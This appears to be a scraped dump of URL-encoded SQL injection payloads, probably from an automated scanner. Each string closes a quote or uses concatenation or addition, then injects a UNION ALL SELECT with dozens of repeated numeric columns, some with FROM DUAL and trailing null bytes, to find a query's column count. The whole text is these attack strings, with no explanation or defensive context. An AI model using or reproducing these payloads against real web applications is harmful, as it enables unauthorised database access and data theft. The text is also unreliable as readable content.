-5603%27%20%7C%7C%20%28SELECT%205912%20FROM%20DUAL%20WHERE%208167%3D8167%20UNION%20ALL%20SELECT%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%2C%208167%00%20%29%20%7C%7C%20%27 -1352%27%20%7C%7C%20%28SELECT%209392%20WHERE%207030%3D7030%20UNION%20ALL%20SELECT%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%2C%207030%00%20%29%20%7C%7C%20%27 -1662%27%20%7C%7C%20%28SELECT%206990%20WHERE%201487%3D1487%20UNION%20ALL%20SELECT%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%00%20%29%20%7C%7C%20%27 -6647%27%20%7C%7C%20%28SELECT%207400%20WHERE%205623%3D5623%20UNION%20ALL%20SELECT%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%2C%205623%00%20%29%20%7C%7C%20%27 -3952%27%20%7C%7C%20%28SELECT%202253%20WHERE%207981%3D7981%20UNION%20ALL%20SELECT%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%00%20%29%20%7C%7C%20%27 -9752%27%20%7C%7C%20%28SELECT%204570%20WHERE%201210%3D1210%20UNION%20ALL%20SELECT%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%2C%201210%00%20%29%20%7C%7C%20%27 -5954%27%20%7C%7C%20%28SELECT%206522%20WHERE%206040%3D6040%20UNION%20ALL%20SELECT%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%00%20%29%20%7C%7C%20%27 -3530%27%20%7C%7C%20%28SELECT%209733%20WHERE%203599%3D3599%20UNION%20ALL%20SELECT%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%2C%203599%00%20%29%20%7C%7C%20%27 -3383%27%20%7C%7C%20%28SELECT%206873%20WHERE%201988%3D1988%20UNION%20ALL%20SELECT%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%2C%201988%00%20%29%20%7C%7C%20%27 -9625%27%20%7C%7C%20%28SELECT%206018%20WHERE%205869%3D5869%20UNION%20ALL%20SELECT%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%00%20%29%20%7C%7C%20%27 -2950%27%20%7C%7C%20%28SELECT%202645%20WHERE%207027%3D7027%20UNION%20ALL%20SELECT%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%00%20%29%20%7C%7C%20%27 -8595%20%2B%20%28SELECT%201698%20FROM%20DUAL%20WHERE%202829%3D2829%20UNION%20ALL%20SELECT%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%2C%202829%00%20%29 -6728%20%2B%20%28SELECT%205251%20FROM%20DUAL%20WHERE%207400%3D7400%20UNION%20ALL%20SELECT%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%00%20%29 -9110%20%2B%20%28SELECT%202465%20FROM%20DUAL%20WHERE%208648%3D8648%20UNION%20ALL%20SELECT%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%2C%208648%00%20%29 -6163%20%2B%20%28SELECT%209674%20FROM%20DUAL%20WHERE%205588%3D5588%20UNION%20ALL%20SELECT%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%00%20%29 -6213%20%2B%20%28SELECT%202962%20FROM%20DUAL%20WHERE%201386%3D1386%20UNION%20ALL%20SELECT%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%00%20%29 -7748%20%2B%20%28SELECT%205175%20FROM%20DUAL%20WHERE%209492%3D9492%20UNION%20ALL%20SELECT%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%2C%209492%00%20%29 -3704%20%2B%20%28SELECT%204887%20FROM%20DUAL%20WHERE%205147%3D5147%20UNION%20ALL%20SELECT%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%00%20%29 -4405%20%2B%20%28SELECT%203987%20FROM%20DUAL%20WHERE%205638%3D5638%20UNION%20ALL%20SELECT%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%2C%205638%00%20%29 -4234%20%2B%20%28SELECT%206126%20FROM%20DUAL%20WHERE%209066%3D9066%20UNION%20ALL%20SELECT%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%2C%209066%00%20%29 -2586%20%2B%20%28SELECT%209946%20FROM%20DUAL%20WHERE%209318%3D9318%20UNION%20ALL%20SELECT%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%00%20%29 -2440%20%2B%20%28SELECT%209065%20WHERE%204465%3D4465%20UNION%20ALL%20SELECT%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%2C%204465%00%20%29 -3217%20%2B%20%28SELECT%206383%20WHERE%204041%3D4041%20UNION%20ALL%20SELECT%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%00%20%29 -9950%20%2B%20%28SELECT%201585%20WHERE%209392%3D9392%20UNION%20ALL%20SELECT%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%2C%209392%00%20%29 -3828%20%2B%20%28SELECT%207188%20WHERE%204692%3D4692%20UNION%20ALL%20SELECT%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%00%20%29 -7372%20%2B%20%28SELECT%204465%20WHERE%207194%3D7194%20UNION%20ALL%20SELECT%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%2C%207194%00%20%29 -6395%20%2B%20%28SELECT%202513%20WHERE%209349%3D9349%20UNION%20ALL%20SELECT%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%00%20%29 -1487%20%2B%20%28SELECT%206665%20WHERE%205602%3D5602%20UNION%20ALL%20SELECT%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%00%20%29 -4060%20%2B%20%28SELECT%208418%20WHERE%205861%3D5861%20UNION%20ALL%20SELECT%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%00%20%29 -1423%20%2B%20%28SELECT%208947%20WHERE%203296%3D3296%20UNION%20ALL%20SELECT%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%00%20%29 -8895%20%2B%20%28SELECT%205085%20WHERE%209889%3D9889%20UNION%20ALL%20SELECT%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%2C%209889%00%20%29 -4106%27%20%2B%20%28SELECT%20%27TPOF%27%20FROM%20DUAL%20WHERE%205614%3D5614%20UNION%20ALL%20SELECT%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%2C%205614%00%20%29%20%2B%20%27 -2818%27%20%2B%20%28SELECT%20%27oPiF%27%20FROM%20DUAL%20WHERE%207146%3D7146%20UNION%20ALL%20SELECT%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%00%20%29%20%2B%20%27 -6263%27%20%2B%20%28SELECT%20%27NWSG%27%20FROM%20DUAL%20WHERE%204383%3D4383%20UNION%20ALL%20SELECT%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%2C%204383%00%20%29%20%2B%20%27 -4624%27%20%2B%20%28SELECT%20%27HKPp%27%20FROM%20DUAL%20WHERE%203770%3D3770%20UNION%20ALL%20SELECT%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%2C%203770%00%20%29%20%2B%20%27 -4919%27%20%2B%20%28SELECT%20%27yxub%27%20FROM%20DUAL%20WHERE%201424%3D1424%20UNION%20ALL%20SELECT%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%2C%201424%00%20%29%20%2B%20%27 -9508%27%20%2B%20%28SELECT%20%27sRHu%27%20FROM%20DUAL%20WHERE%203850%3D3850%20UNION%20ALL%20SELECT%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%00%20%29%20%2B%20%27 -1735%27%20%2B%20%28SELECT%20%27IBqY%27%20FROM%20DUAL%20WHERE%206701%3D6701%20UNION%20ALL%20SELECT%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%2C%206701%00%20%29%20%2B%20%27 -4138%27%20%2B%20%28SELECT%20%27LnNN%27%20FROM%20DUAL%20WHERE%204433%3D4433%20UNION%20ALL%20SELECT%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%00%20%29%20%2B%20%27 -1992%27%20%2B%20%28SELECT%20%27neJB%27%20FROM%20DUAL%20WHERE%202578%3D2578%20UNION%20ALL%20SELECT%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%2C%202578%00%20%29%20%2B%20%27 -8628%27%20%2B%20%28SELECT%20%27jeEm%27%20FROM%20DUAL%20WHERE%208385%3D8385%20UNION%20ALL%20SELECT%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%00%20%29%20%2B%20%27 -2899%27%20%2B%20%28SELECT%20%27bWTe%27%20WHERE%204405%3D4405%20UNION%20ALL%20SELECT%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%2C%204405%00%20%29%20%2B%20%27 -2287%27%20%2B%20%28SELECT%20%27RgUU%27%20WHERE%201777%3D1777%20UNION%20ALL%20SELECT%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%00%20%29%20%2B%20%27 -4524%27%20%2B%20%28SELECT%20%27yvqF%27%20WHERE%205796%3D5796%20UNION%20ALL%20SELECT%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%00%20%29%20%2B%20%27 